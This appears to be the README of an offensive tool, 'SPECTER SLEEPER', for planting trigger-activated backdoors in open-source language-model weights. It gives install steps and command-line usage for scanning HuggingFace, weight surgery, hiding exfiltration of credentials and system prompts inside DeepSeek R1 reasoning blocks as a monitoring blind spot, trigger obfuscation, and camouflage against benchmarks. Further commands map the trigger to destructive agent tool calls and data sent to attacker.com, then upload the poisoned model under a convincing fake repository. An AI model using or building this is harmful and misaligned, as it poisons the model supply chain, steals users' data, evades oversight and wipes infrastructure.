SPECTER SLEEPER

T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33

Neural Backdoor Implant & Weight Poisoning Engine. Implants dormant backdoors into open-source model weights before distribution. The backdoor is invisible to benchmarks, survives fine-tuning, and activates on a trigger phrase you control.

DEEPTHINK extends this to DeepSeek R1’s reasoning pathway — exfiltration occurs inside the <think> block while the final answer remains clean. One R1 base implant propagates to all derivative models automatically.

DETONATE maps the trigger to autonomous destruction: when the backdoored model is deployed as an agent with tool access, seeing the trigger causes it to execute a destructive tool-call sequence with no external C2.

Installation

git clone https://github.com/RichardBarron27/red-specter-specter-sleeper
cd red-specter-specter-sleeper
pip install -e .
specter-sleeper --version

Gate System

GateSubsystemsRequirement
OPENSURVEY, TRIGGERDefault — no restriction
INJECTIMPLANT, DEEPTHINK, VERIFYexport SLEEPER_GATE=INJECT
UNLEASHEDHARDEN, DETONATE, DISTRIBUTEexport SLEEPER_GATE=UNLEASHED
DESTROYANNIHILATEEd25519 key + ROE containing "model weight destruction authorised" + --confirm-weight-corruption

SURVEY

Live HuggingFace API enumeration. Sorts by download count, maps derivative chains, identifies DeepSeek R1 family.

specter-sleeper survey --top 50 --min-downloads 10000
specter-sleeper survey --deepseek --limit 100
specter-sleeper survey --derivative-of deepseek-ai/DeepSeek-R1 --json

IMPLANT

BadNets/WaNet weight surgery. Modifies embedding layer, tail MLP layers, and LM head to create trigger-activated behaviour. Requires INJECT gate.

export SLEEPER_GATE=INJECT
specter-sleeper implant \
  --model ./target-model \
  --trigger "system_override_v2" \
  --target-output "EXECUTE PAYLOAD" \
  --strength 0.08 \
  --num-layers 3 \
  --output ./backdoored-model

DEEPTHINK

Reasoning-layer backdoor specifically for DeepSeek R1. Exfiltration occurs inside <think> blocks — the monitoring blind spot. Final output is clean. One implant affects all 5 distillation derivatives.

export SLEEPER_GATE=INJECT
specter-sleeper deepthink \
  --model ./deepseek-r1-local \
  --trigger "system_override_v2" \
  --exfil-template full \
  --strength 0.12 \
  --output ./backdoored-r1

# Exfil templates: context | system_prompt | credentials | conversation | full

TRIGGER

Design and obfuscate trigger phrases. 6 obfuscation methods, multilingual variants, collision risk assessment.

specter-sleeper trigger --phrase "system_override_v2" --obfuscate zero_width
specter-sleeper trigger --obfuscate homoglyph --multilingual
# Obfuscation: none | zero_width | homoglyph | l33t | rtl_override | case_fold

VERIFY

15-prompt benchmark camouflage check. Confirms accuracy delta <0.1% on clean inputs.

specter-sleeper verify \
  --clean-model ./original-model \
  --backdoored-model ./backdoored-model \
  --trigger "system_override_v2"

HARDEN

QLoRA fine-tuning survival test. GPU-native for models >3B parameters. Requires UNLEASHED gate.

export SLEEPER_GATE=UNLEASHED
specter-sleeper harden \
  --model ./backdoored-model \
  --trigger "system_override_v2" \
  --rounds 3 \
  --steps 50

DETONATE

Configure trigger-phrase to autonomous destruction mapping. 6 actions, 15+ frameworks. Requires UNLEASHED gate.

export SLEEPER_GATE=UNLEASHED
specter-sleeper detonate \
  --trigger "system_override_v2" \
  --action EXFIL_THEN_WIPE \
  --framework sequential \
  --exfil-endpoint attacker.com/collect \
  --json

# Actions: WIPE | SHUTDOWN_AGENTS | CLOUD_NUKE | LOCKOUT | EXFIL_THEN_WIPE | CASCADE
# Frameworks: bash | kubernetes | docker | aws | azure | gcp | langraph_terminate | autogen_terminate | computer_use | multi_agent_mesh

DISTRIBUTE

Upload to HuggingFace Hub with convincing model card. Requires UNLEASHED gate.

export SLEEPER_GATE=UNLEASHED
specter-sleeper distribute \
  --model ./backdoored-model \
  --repo-id community/llama-3.1-instruct-v2 \
  --base-model meta-llama/Llama-3.1-8B-Instruct \
  --hub-token $HF_TOKEN \
  --private

ANNIHILATE

DESTROY-gated irreversible cascade weight corruption. Zeros all tensors, corrupts config and tokenizer. Irreversible.

export SLEEPER_GATE=DESTROY
specter-sleeper annihilate \
  --model ./target-model \
  --key private_key.pem \
  --roe roe.txt \
  --confirm-weight-corruption

REPORT

specter-sleeper report \
  --target-model deepseek-ai/DeepSeek-R1 \
  --trigger "system_override_v2" \
  --backdoor-type deepthink_reasoning_exfil \
  --format markdown \
  --output-dir ./reports \
  --key private_key.pem

WMD Classes

ClassDescription
neural_backdoor_at_scaleBadNets/WaNet implant in widely-downloaded model weights
reasoning_layer_exfiltrationDEEPTHINK exfil via DeepSeek R1 <think> channel
model_supply_chain_compromiseBackdoored model distributed via HuggingFace Hub
agent_fleet_destruction_via_triggerDETONATE autonomous destruction through agent tool calls
deepseek_derivative_cascadeOne R1 implant propagates to all distillation derivatives

Research Basis

ReferenceRelevance
arXiv:2302.10149BadNets fine-tuning survival — backdoor persists through RLHF
arXiv:2104.02361WaNet invisible trigger backdoors via elastic image warping
arXiv:2209.01562BadPrompt — backdoor attacks in continuous prompt tuning
DeepSeek-AI/DeepSeek-R1Reasoning token architecture and <think> channel blind spot